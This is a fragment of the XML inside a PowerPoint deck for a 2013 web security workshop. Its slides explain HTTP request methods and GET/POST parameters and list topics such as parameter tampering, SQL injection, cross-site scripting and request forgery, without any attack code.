              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PUT changes your bio</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DELETE gets rid of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>embarrasssing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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97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HTTP Request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Along with URL and method, requests carry data in the form of parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>GET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Visible from URL:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://www.facespace.com/profile.php?id=13</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can be used easily in hyperlinks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>POST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Not visible in URL or link, embedded in request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We can still alter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1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</TotalTime>
  <Words>923</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>205</Paragraphs>
  <Slides>45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Median</vt:lpstr>
      <vt:lpstr>Web Security workshop TexSaw 2013</vt:lpstr>
      <vt:lpstr>Introduction and Background</vt:lpstr>
      <vt:lpstr>Tools</vt:lpstr>
      <vt:lpstr>Targets</vt:lpstr>
      <vt:lpstr>Web Servers</vt:lpstr>
      <vt:lpstr>URLs</vt:lpstr>
      <vt:lpstr>HTTP</vt:lpstr>
      <vt:lpstr>HTTP Requests</vt:lpstr>
      <vt:lpstr>HTTP Request Parameters</vt:lpstr>
      <vt:lpstr>Parameter Tampering</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>Example – Game High Scores</vt:lpstr>
      <vt:lpstr>Example – Game High Scores</vt:lpstr>
      <vt:lpstr>Example – Game High Scores</vt:lpstr>
      <vt:lpstr>Attack – Game High Scores</vt:lpstr>
      <vt:lpstr>Example – PayPal</vt:lpstr>
      <vt:lpstr>Example – PayPal</vt:lpstr>
      <vt:lpstr>Example – PayPal</vt:lpstr>
      <vt:lpstr>Attack – PayPal</vt:lpstr>
      <vt:lpstr>Attack – PayPal</vt:lpstr>
      <vt:lpstr>Tools and Demo</vt:lpstr>
      <vt:lpstr>Mitigation</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Attack</vt:lpstr>
      <vt:lpstr>Another injection</vt:lpstr>
      <vt:lpstr>Demo</vt:lpstr>
      <vt:lpstr>Mitigation</vt:lpstr>
      <vt:lpstr>Cross Site Scripting</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>Payloads and Goals</vt:lpstr>
      <vt:lpstr>Example Attack</vt:lpstr>
      <vt:lpstr>Demo</vt:lpstr>
      <vt:lpstr>Mitigation</vt:lpstr>
      <vt:lpstr>Cross Server Request Forgery</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>Example Attack</vt:lpstr>
      <vt:lpstr>Demo</vt:lpstr>
      <vt:lpstr>Mitigation</vt:lpstr>
      <vt:lpstr>General Tips</vt:lpstr>
      <vt:lpstr>Look at Requests!</vt:lpstr>
      <vt:lpstr>Inject Everything</vt:lpstr>
      <vt:lpstr>Questions?</vt:lpstr>
      <vt:lpstr>CTF Time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Crash Course</dc:title>
  <dc:creator>Scott</dc:creator>
  <cp:lastModifiedBy>Kamil</cp:lastModifiedBy>
  <cp:revision>53</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-02-09T10:26:46Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-11-04T17:02:14Z</dcterms:modified>
</cp:coreProperties>
</file>